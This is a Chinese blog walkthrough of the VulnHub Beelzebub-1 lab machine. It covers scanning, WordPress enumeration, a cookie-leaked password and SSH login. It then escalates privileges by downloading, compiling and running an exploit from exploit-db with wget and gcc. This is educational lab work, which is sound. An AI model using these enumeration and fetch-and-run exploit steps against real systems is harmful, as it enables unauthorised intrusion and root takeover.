首页 > 其他分享 >『vulnhub系列』BEELZEBUB- 1 96692f0bce834b9f85ce4fb6710ae52d

『vulnhub系列』BEELZEBUB- 1 96692f0bce834b9f85ce4fb6710ae52d

时间:2024-05-27 11:12:03浏览次数:14  
标签:-- 96692f0bce834b9f85ce4fb6710ae52d 使用 扫描 192.168 vulnhub BEELZEBUB 页面

『vulnhub系列』BEELZEBUB- 1

下载地址:

https://www.vulnhub.com/entry/beelzebub-1,742/

信息搜集:

使用nmap扫描存活主机,发现主机开启了22和80端口

nmap 192.168.0.*

访问80端口的web服务,发现是apache的默认页面

使用dirsearch扫描目录

dirsearch -u "http://192.168.0.140/"

发现存在phpmyadmin等页面,访问index.php页面,发现是404 /login也是一样

感觉有猫腻,查看一下源代码,果然发现一行提示

<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
#我的心被加密了,"beelzebub"不知如何被入侵了,并且被解密了 md5

大概的意思是本来是被加密的,后来被用md5解密了,现在我们使用md5加密一下

d18e1e22becbd915b45e0e655429d487

然后当作目录扫描一下

dirsearch -u "http://192.168.0.140/d18e1e22becbd915b45e0e655429d487"

然后我们发现是个Wordpress 网站,里面有登录页面(这里靶机换了ip变为192.168.0.128

还有一个文件上传的目录页面

点开Talk To VALAK 发现是个带有输入框的页面

随便输入一个数据,查看cookie 多出来一个Password 值为M4k3Ad3a1

因为是Wordpress页面,因此可以使用工具wpscan

使用命令:

wpscan --url=http://192.168.0.128/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive
  • --ignore-main-redirect 忽略重定向扫描目标
  • --force 不检查是否运行wordpress
  • -e --enumerate 枚举,默认枚举所有插件,备份
  • --plugins-detection aggressive 使用提供的模式枚举插件 默认被动(passvie)可选:混合(mix)被动(passvie)主动(aggressive)

扫描到用户valakkrampus 我们使用这两个用户名和密码M4k3Ad3a1进行登录

因为wordpress页面跳转有些问题,我们使用ssh登录,使用krampus登录成功

权限提升:

进入系统后,使用命令ls -la 发现有两个文件很可疑

但是.sudo_as_admin_successful 大小为0所以我们直接看.bash_history可以看到命令历史

然后我们发现有一个wgetgcc编译命令,我们照着运行

wget https://www.exploit-db.com/download/47009

mv 47009 ./exploit.c

gcc exploit.c -o 1

./1

成果:

标签:--,96692f0bce834b9f85ce4fb6710ae52d,使用,扫描,192.168,vulnhub,BEELZEBUB,页面
From: https://www.cnblogs.com/obeto/p/18215103

相关文章

  • 『vulnhub系列』doubletrouble-1
    『vulnhub系列』doubletrouble-1下载地址https://www.vulnhub.com/entry/doubletrouble-1,743/信息搜集使用命令,获得存活靶机IP为138,开启端口22和80nmap192.168.0.*#因为当前NAT模式,攻击机和靶机在一个内网环境中访问80的web服务,是一个登录页面又是qdPm,之前做过一个q......
  • 『vulnhub系列』Dripping-Blues-1
    『vulnhub系列』Dripping-Blues-1下载地址:https://www.vulnhub.com/entry/dripping-blues-1,744/信息搜集:使用nmap进行本地扫描,确定Ip地址为137nmap192.168.0.*访问80端口web服务,有一串文字,意思大概是被攻击了,然后开了个小玩笑这个名字可能会有用travisscott&thugger......
  • vulnhub--JIS靶场
    环境搭建kali(攻击机,NAT):192.168.96.4靶机(linux,NAT):ip未知信息收集主机探测netdiscover-i监听网卡发现96网段存活主机,猜测是96.5为靶机地址端口扫描nmap-sS-v192.168.96.5(高校快速的扫描,TCP半链接扫描) nmap-A192.168.96.5(全面扫描,更全面)fscan既可以扫端口又......
  • vulnhub - NYX: 1
    vulnhub-NYX:1描述这是一个简单的盒子,非常基本的东西。它是基于vmware的,我不知道它是否可以在VB上运行,如果你愿意的话可以测试一下。/home/$user/user.txt和/root/root.txt下有2个标志。信息收集NYX靶ip:192.168.157.159nmap-sT-sV-sC-O-p22,80192.168.157.1......
  • vulnhub - w1r3s.v1.0.1
    vulnhub-w1r3s.v1.0.1高质量视频教程-b站红队笔记靶机下载本地环境本机ip:192.168.157.131w1r3s虚拟机设置NAT模式信息收集扫描网段得到攻击机ip:192.168.157.158详细信息扫描nmap-A-p-192.168.157.158开放了四个端口21FTP协议(可匿名登录访问)22SSH80http......
  • 13、LAMP SecurityCTF5(VulnHub)
    LAMPSecurityCTF5一、nmapcatports|grepopen|awk-F'/''{print$1}'|tr'\n'','catports|grepopen|awk-F'/''{print$1}'|paste-sd','>nmap_open_port_total.txt......
  • 14、pWnOS_v2.0(VulnHub)
    pWnOS_v2.0一、nmap靶机ip找不见的自行上网查找解决办法。二、web渗透目录爆破/blog/whatweb/search.php/register.phpqwe123qwe点击给定的链接兔子洞,无法登入?一直卡在这个界面wfuzz貌似没什么用nmap->目录SimplePHPBlog0.4.0perl1191.pl......
  • 39、BlackRose(VulnHub)
    BlackRose一、nmap二、web渗透随便看看注册进去账号:xxxxxx密码:xxxxxx目录爆破有很多特殊的目录,不过访问后都重定向了burpsuite改包进admin查看xxxxxx用户数据包抓一些xxxxxx用户的一些记录包,看看有什么可用的signature=&command=id&indexcsrf=3cb58993bfd71f......
  • 37、Tomato(VulnHub)
    Tomato一、nmap2211是ssh的端口,21的ftp也不是弱密码二、web渗透随便看看目录爆破/seclists/Discovery/Web-Content/common.txt/antibot_image/antibots/readme.txt发现该站点存在反爬机制/antibot_image/antibots/info.php提示我们该网页存在个参数GET:image......
  • VMware 和 Oracle VM VirtualBox 网络互通(kali 与 vulnhub靶机 互通)
    由于有些从vulnhub下载的虚拟机只能用VirtualBox打开,而kali又在VMware上,两台虚拟机属于不同网段,即便同一网段也会存在无法上网的问题。在此记录一下解决方法首先查看kali(VMWare)与靶机(OracleVMVirtualBox)的IPkaliIP:192.168.198.128/24靶机IP:192.168.56.103/24(靶......